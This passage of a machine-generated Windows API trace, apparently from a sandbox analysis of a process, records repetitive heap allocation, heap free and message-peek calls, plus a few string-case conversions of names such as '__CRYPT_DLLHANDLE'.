(HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0111.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0111.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0111.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2600 [0111.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0111.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0111.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0111.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25c0 [0111.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0111.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0111.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0111.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca658 [0111.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0111.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0111.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0111.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0111.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0111.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1eef) returned 0x4517f08 [0111.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0111.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0111.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0111.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0111.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0111.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0111.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0111.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0111.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0111.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0111.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0111.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0111.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0111.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0111.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0111.550] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0111.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0111.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0111.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0111.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0111.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0111.550] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0111.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0111.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0111.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0111.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0111.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0111.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0111.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0111.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0111.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0111.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0111.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0111.551] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0111.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0111.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0111.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0111.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2580 [0111.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0111.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0111.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0111.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0111.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca610 [0111.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0111.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0111.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0111.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0111.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0111.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0111.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0111.551] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0111.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0111.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0111.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0111.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0111.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0111.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0111.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0111.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0111.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0111.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0111.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0111.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0111.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0111.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0111.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0111.552] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0111.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0111.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0111.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0111.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0111.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0111.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0111.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0111.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0111.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0111.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0111.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0111.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0111.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0111.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0111.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0111.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0111.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0111.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0111.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0111.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0111.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0111.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0111.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0111.553] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0111.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0111.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0111.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0111.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0111.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0111.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0111.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0111.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0111.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0111.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0111.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0111.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e00 [0111.553] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e00 | out: hHeap=0x1780000) returned 1 [0111.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0111.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca820 [0111.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0111.553] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0111.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0111.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0111.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0111.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0111.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0111.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0111.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0111.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0111.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0111.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0111.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0111.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0111.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0111.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0111.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0111.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0111.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0111.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0111.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0111.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0111.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0111.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0111.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0111.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0111.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0111.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0111.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0111.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0111.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0111.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0111.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0111.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0111.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0111.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0111.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0111.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0111.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0111.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796d68 [0111.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0111.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0111.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0111.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0111.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0111.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0111.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0111.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0111.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0111.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0111.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0111.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0111.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0111.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0111.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0111.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0111.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0111.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0111.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0111.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0111.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0111.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0111.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0111.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0111.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0111.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0111.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0111.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0111.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0111.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0111.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0111.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0111.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0111.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0111.556] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0111.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0111.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0111.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0111.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0111.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0111.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0111.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0111.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0111.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0111.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0111.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0111.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0111.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0111.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0111.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0111.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0111.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0111.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0111.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0111.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0111.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0111.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0111.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0111.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0111.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0111.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0111.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0111.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0111.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0111.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0111.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0111.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0111.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0111.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0111.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0111.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0111.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0111.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0111.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0111.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0111.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0111.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0111.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0111.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0111.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0111.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0111.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0111.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0111.558] HeapFree (in: 